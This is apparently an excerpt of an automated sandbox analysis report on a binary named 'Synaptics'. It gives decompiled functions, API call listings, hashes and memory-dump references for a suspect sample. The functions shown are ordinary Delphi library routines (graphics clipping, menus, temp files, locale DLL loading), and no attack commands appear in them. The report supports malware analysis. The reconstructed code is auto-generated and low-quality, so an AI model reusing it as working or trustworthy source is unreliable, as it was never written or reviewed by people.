                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: TextWindow$Length
                                                                                                                                                                                          • String ID: Active ->
                                                                                                                                                                                          • API String ID: 1006428111-2811066380
                                                                                                                                                                                          • Opcode ID: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
                                                                                                                                                                                          • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t31;
				void* _t36;
				intOrPtr _t42;
				struct HDC__* _t47;
				void* _t50;

				_push(__esi);
				_v16 = 0;
				_t36 = __eax;
				_push(_t50);
				_push(0x43b326);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					_t31 =  *0x49dc4c; // 0x422f30
					E00406A70(_t31,  &_v16);
					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
					E00404378();
				}
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x43b32d);
				return E004049C0( &_v16);
			}











                                                                                                                                                                                          0x0043b297
                                                                                                                                                                                          0x0043b29a
                                                                                                                                                                                          0x0043b29d
                                                                                                                                                                                          0x0043b2a1
                                                                                                                                                                                          0x0043b2a2
                                                                                                                                                                                          0x0043b2a7
                                                                                                                                                                                          0x0043b2aa
                                                                                                                                                                                          0x0043b2b1
                                                                                                                                                                                          0x0043b2b6
                                                                                                                                                                                          0x0043b2b9
                                                                                                                                                                                          0x0043b2c6
                                                                                                                                                                                          0x0043b2cb
                                                                                                                                                                                          0x0043b2da
                                                                                                                                                                                          0x0043b2df
                                                                                                                                                                                          0x0043b2df
                                                                                                                                                                                          0x0043b2ec
                                                                                                                                                                                          0x0043b2f9
                                                                                                                                                                                          0x0043b30b
                                                                                                                                                                                          0x0043b312
                                                                                                                                                                                          0x0043b315
                                                                                                                                                                                          0x0043b318
                                                                                                                                                                                          0x0043b325

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                                                                                                                                                          • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipIntersectLoadRectStringViewport
                                                                                                                                                                                          • String ID: 0/B
                                                                                                                                                                                          • API String ID: 2734429277-1373906003
                                                                                                                                                                                          • Opcode ID: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                          • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043B338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043B338(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E0041AC6C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043A91C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                                                                                                                                          0x0043b341
                                                                                                                                                                                          0x0043b34e
                                                                                                                                                                                          0x0043b361
                                                                                                                                                                                          0x0043b365
                                                                                                                                                                                          0x0043b3b5
                                                                                                                                                                                          0x0043b3b5
                                                                                                                                                                                          0x0043b367
                                                                                                                                                                                          0x0043b367
                                                                                                                                                                                          0x0043b367
                                                                                                                                                                                          0x0043b371
                                                                                                                                                                                          0x0043b377
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043b37f
                                                                                                                                                                                          0x0043b384
                                                                                                                                                                                          0x0043b398
                                                                                                                                                                                          0x0043b3af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043b3af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043b3b1
                                                                                                                                                                                          0x0043b3b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043b367
                                                                                                                                                                                          0x0043b3b9
                                                                                                                                                                                          0x0043b3c2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$EqualIntersect
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3291753422-2766056989
                                                                                                                                                                                          • Opcode ID: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                          • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047DF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E0047DF40(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __esi) {
				char _v8;
				CHAR* _t9;
				intOrPtr _t10;
				CHAR* _t21;
				intOrPtr* _t28;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_t28 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x47dfd7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E0040500C(__edx, 0x105);
				if(_t38 <= 0) {
					_t9 = E00404E80( *_t28);
					_t10 =  *0x49eea8; // 0x22b2010
					GetTempFileNameA(E00404E80(_t10), "Indy", 0, _t9);
				} else {
					_t21 = E00404E80( *_t28);
					E0047DBD4(_t38,  &_v8);
					GetTempFileNameA(E00404E80(_v8), "Indy", 0, _t21);
				}
				E00404BB8(_t28, E00404E80( *_t28));
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x47dfde);
				return E004049C0( &_v8);
			}











                                                                                                                                                                                          0x0047df43
                                                                                                                                                                                          0x0047df47
                                                                                                                                                                                          0x0047df49
                                                                                                                                                                                          0x0047df4d
                                                                                                                                                                                          0x0047df4e
                                                                                                                                                                                          0x0047df53
                                                                                                                                                                                          0x0047df56
                                                                                                                                                                                          0x0047df60
                                                                                                                                                                                          0x0047df67
                                                                                                                                                                                          0x0047df94
                                                                                                                                                                                          0x0047dfa1
                                                                                                                                                                                          0x0047dfac
                                                                                                                                                                                          0x0047df69
                                                                                                                                                                                          0x0047df6b
                                                                                                                                                                                          0x0047df7d
                                                                                                                                                                                          0x0047df8b
                                                                                                                                                                                          0x0047df8b
                                                                                                                                                                                          0x0047dfbc
                                                                                                                                                                                          0x0047dfc3
                                                                                                                                                                                          0x0047dfc6
                                                                                                                                                                                          0x0047dfc9
                                                                                                                                                                                          0x0047dfd6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DF8B
                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DFAC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileNameTemp
                                                                                                                                                                                          • String ID: Indy
                                                                                                                                                                                          • API String ID: 745986568-2908309946
                                                                                                                                                                                          • Opcode ID: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                          • Instruction ID: 49c60834a58869adaa52c85b93ece72bdbff6cc483172d4f67a88a61853ae6a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC018470B142046BDB10F67ADC42B5A72ADEF84714F52447BF905EB281C67CAD04869D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C794 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49e92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x49e90c; // 0x42c794
					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x49e90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                                                                                                                                          0x0042c79a
                                                                                                                                                                                          0x0042c7a4
                                                                                                                                                                                          0x0042c7ce
                                                                                                                                                                                          0x0042c7d7
                                                                                                                                                                                          0x0042c7ff
                                                                                                                                                                                          0x0042c7ff
                                                                                                                                                                                          0x0042c7d9
                                                                                                                                                                                          0x0042c7d9
                                                                                                                                                                                          0x0042c7de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042c7de
                                                                                                                                                                                          0x0042c7a6
                                                                                                                                                                                          0x0042c7ab
                                                                                                                                                                                          0x0042c7b8
                                                                                                                                                                                          0x0042c7ca
                                                                                                                                                                                          0x0042c7ca
                                                                                                                                                                                          0x0042c80a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C7E2
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C7F4
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                          • String ID: MonitorFromPoint
                                                                                                                                                                                          • API String ID: 1792783759-1072306578
                                                                                                                                                                                          • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                          • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E0042C66C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49e92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49e908; // 0x42c66c
					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x49e908(_t14, _t17);
				}
				return _t19;
			}












                                                                                                                                                                                          0x0042c672
                                                                                                                                                                                          0x0042c675
                                                                                                                                                                                          0x0042c67f
                                                                                                                                                                                          0x0042c6a4
                                                                                                                                                                                          0x0042c6ad
                                                                                                                                                                                          0x0042c6d4
                                                                                                                                                                                          0x0042c6d4
                                                                                                                                                                                          0x0042c681
                                                                                                                                                                                          0x0042c686
                                                                                                                                                                                          0x0042c693
                                                                                                                                                                                          0x0042c6a0
                                                                                                                                                                                          0x0042c6a0
                                                                                                                                                                                          0x0042c6df

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C6BD
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C6C9
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                          • String ID: MonitorFromRect
                                                                                                                                                                                          • API String ID: 1792783759-4033241945
                                                                                                                                                                                          • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                          • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044AE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0044AE70(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x449b38; // 0x449b84
					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E00449F18();
					}
					E0044AC00(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                                                                                                                                                          0x0044ae71
                                                                                                                                                                                          0x0044ae77
                                                                                                                                                                                          0x0044ae7c
                                                                                                                                                                                          0x0044ae89
                                                                                                                                                                                          0x0044ae9a
                                                                                                                                                                                          0x0044ae8b
                                                                                                                                                                                          0x0044ae90
                                                                                                                                                                                          0x0044ae90
                                                                                                                                                                                          0x0044aea1
                                                                                                                                                                                          0x0044aea8
                                                                                                                                                                                          0x0044aea8
                                                                                                                                                                                          0x0044aeaf
                                                                                                                                                                                          0x0044aeaf
                                                                                                                                                                                          0x0044aeb8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                          • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateMenu$Popup
                                                                                                                                                                                          • String ID: .B
                                                                                                                                                                                          • API String ID: 257293969-2011479308
                                                                                                                                                                                          • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                          • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                                                                                                                          0x004061d1
                                                                                                                                                                                          0x004061d3
                                                                                                                                                                                          0x004061db
                                                                                                                                                                                          0x004061ec
                                                                                                                                                                                          0x004061f1
                                                                                                                                                                                          0x0040620a
                                                                                                                                                                                          0x00406211
                                                                                                                                                                                          0x00406253
                                                                                                                                                                                          0x00406255
                                                                                                                                                                                          0x00406256
                                                                                                                                                                                          0x0040625b
                                                                                                                                                                                          0x0040625e
                                                                                                                                                                                          0x00406261
                                                                                                                                                                                          0x00406273
                                                                                                                                                                                          0x00406296
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062ba
                                                                                                                                                                                          0x004062c0
                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                          0x004062c6
                                                                                                                                                                                          0x004062d4
                                                                                                                                                                                          0x00406213
                                                                                                                                                                                          0x00406228
                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406231
                                                                                                                                                                                          0x00406246
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x0040622f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
